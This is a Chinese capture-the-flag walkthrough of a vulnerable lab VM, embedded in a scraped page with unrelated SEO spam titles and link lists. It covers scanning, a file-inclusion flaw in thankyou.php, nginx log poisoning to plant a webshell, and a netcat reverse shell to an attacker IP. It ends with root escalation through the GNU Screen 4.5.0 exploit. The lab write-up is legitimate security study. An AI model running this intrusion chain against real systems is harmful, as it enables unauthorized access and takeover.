当前位置: 首页 > news >正文

厦门php网站建设重庆制作网站公司

厦门php网站建设,重庆制作网站公司,销氪crm,1小时教你做出个人网页信息收集 主机扫描 sudo arp-scan -l端口扫描 nmap -p- -A 192.168.16.172漏洞发现 浏览器访问靶机IP 在Contact找到类似提交数据的地方 点击submit#xff0c;数字发生变化。不断刷新的话#xff0c;数字依然会发生变化 使用bp抓包发送重发器查看数据包 再次点击发送查看…信息收集 主机扫描 sudo arp-scan -l端口扫描 nmap -p- -A 192.168.16.172漏洞发现 浏览器访问靶机IP 在Contact找到类似提交数据的地方 点击submit数字发生变化。不断刷新的话数字依然会发生变化 使用bp抓包发送重发器查看数据包 再次点击发送查看数据返回包 不断重发数据发现footer不断变化感觉可能存在一个独立的脚本爆破目录查看一下 dirsearch -u 192.168.16.172 -i 200命令解释 dirsearch -u 192.168.16.172 -i 200 是一个用于目录扫描的命令下面对该命令进行详细解释 dirsearch是一个目录扫描工具用于探测Web服务器上的目录和文件。-u 192.168.16.172指定要扫描的目标URL或IP地址。在这个示例中目标是 192.168.16.172。你可以替换这个IP地址为需要扫描的实际目标。-i 200指定要忽略的HTTP状态码。在这个示例中200 表示忽略返回状态码为200的响应。也就是说当目标返回200状态码时不会将其视为敏感路径或文件。 通过执行这条命令dirsearch 工具将发送不同的HTTP请求到目标URL并根据目标服务器的响应来确定是否存在可以访问的目录、文件或敏感路径。它可以帮助发现Web应用程序中可能存在的配置错误、暴露的资源、备份文件等问题。 浏览器访问192.168.16.172这个页面 刷新页面进行查看刷新页面后数字发生变化 将bp数据包中的GET请求更改为/thankyou.php?filefooter.php然后点击发送 再点击发送进行查看 可以确定这里可能存在文件包含漏洞 漏洞利用 再将访问路径改为/etc/passwd可以看到passwd文件 说明了程序代码再处理文件包含是没有严格控制我们可以把访问路径更改为木马文件 发现报了404未找到的错误 对于配置了nginx的网站无论网站有什么操作都会被记录在/var/log/nginx/access.log和/var/log/nginx/error.log中 /thankyou.php?file/var/log/nginx/access.log木马上传成功利用蚁剑进行连接 http://192.168.16.172/thankyou.php?file/var/log/nginx/access.log进行反弹shell kali进行监听 nc -lvvp 8848 #监听网段中所有8848端口利用蚁剑中的虚拟终端反弹shell到攻击机kali上 nc -e /bin/bash 192.168.16.176 8848再看kali已经连接到了 使用python脚本开启交互模式 python -c import pty;pty.spawn(/bin/bash)查看id发现只是普通用户的权限 权限提升 find / -user root -prem /4000 2/dev/null经过查找得知GNU Screen是一款由GNU计划开发的用于命令行终端切换的自由软件。用户可以通过该软件同时连接多个本地或远程的命令行会话并在其间自由切换。GNU Screen可以看作是窗口管理器的命令行界面版本。它提供了统一的管理多个会话的界面和相应的功能。 尝试用searchsploit搜索是否存在漏洞重新打开一个终端进行漏洞查找 searchsploit screen 4.5.0找出41154.sh的绝对路径 searchsploit -p linx/local/41151.sh查看文件内容 cat /usr/share/exploitdb/exploits/linux/local/41154.sh按照文件的说明可分为三部分将第一个框里内容保存为第一文件名为libhax.c然后使用黄色选取的命令编译编译结束会生成libhax.so文件。 第二个框里内容保存为rootshell.c文件使用黄色选区的命令编译编译结束后生成rootshell文件。 将第三个框里内容保存为第三个文件保存为run.sh 。 这个名字随意。 通过蚁剑把libhax.c和rootshell.c拖进靶机跟目录下的tmp目录下 在虚拟终端中对libhax.c和rootshell.c这两个文件进行编译 在蚁剑中点击文件管理进入根目录下的tmp目录进行刷新后编译的文件就出来了 然后把 run.sh也通过蚁剑拖进靶机根目录下的tmp目录中注意是 /tmp/ 那么原来的libhax.c和rootshell.c这两个文件可以删除了因为已经编译好了留着也没有价值 回到通过python得到的交互式的shell里切换到/tmp目录下 运行run.sh输入bash ./run.sh进行提权 通过查看id已知是root用户 进入/root查看是否有flag 总结 信息收集主机发现 netdiscouver端口扫描 nmap目录爆破 dirsearch 漏洞利用bp抓包分析数据包,测试到有文件包含漏洞木马上传查看日志反弹shellpython交互shell 提权find / -user root -perm /4000 2/dev/null#找到所有具有root权限的可执行文件searchsploit screen 4.5.0#通过searchsploit找到Screen这款由GNU计划开发的用于命令行终端切换的自由软件的漏洞libhax.c和rootshell.c文件的编译 run.shbash ./run.sh 提权
http://wiki.neutronadmin.com/news/418231/

相关文章:

  • wordpress 商品站台州wordpress
  • 网站首页怎么用dw做外贸网站推广收费
  • 云南网站建设优化企业青岛代理记账
  • 域名哪个网站买最好python 有wordpress
  • 制作企业网站的流程北京海淀国税局网站
  • 网站建设基本流程教学视频凡客网站登陆
  • wordpress免费建站教程网站建设理由和目的
  • 做爰全的网站建设文明网站包括哪些内容
  • aliyun怎么建网站谷歌浏览器下载手机版官网中文
  • 青岛做网站哪家强企业网站模板php
  • 温州seo建站一个空间可以绑定几个网站
  • 没备案的网站磁力链最佳的搜索引擎
  • 九江建设监督网站学校网络推广方案
  • 网站优化知识资讯网上竞价投标流程
  • 婚纱摄影行业网站建设wordpress 消息通知
  • 网站建设方案报价网站行业
  • 行业网站的优势十年专业网站建设
  • 做西班牙语网站如何常看wordpress默认编辑器
  • 中国行业网站联盟360 网站优化
  • 个人养老保险app下载网站图片优化大小
  • 怎么访问域名网站搜狗怎么做网站
  • 各大网站免费观看吉利的广告公司名字
  • 推荐一个国外好的网站模板在线家装设计平台免费
  • 重庆网站制作企业网站做支付链接安全吗
  • 电商平台搭建沧州seo排名
  • wordpress.org 建站wordpress如何添加关键词和描述
  • 做网站链接怎么做做外贸哪些网站比较好
  • 制作网站需要的技术带会员系统的网站模板
  • 网站建设对于企业的必要性淘宝联盟如何做网站
  • 泗阳县住房和建设局网站网站布局f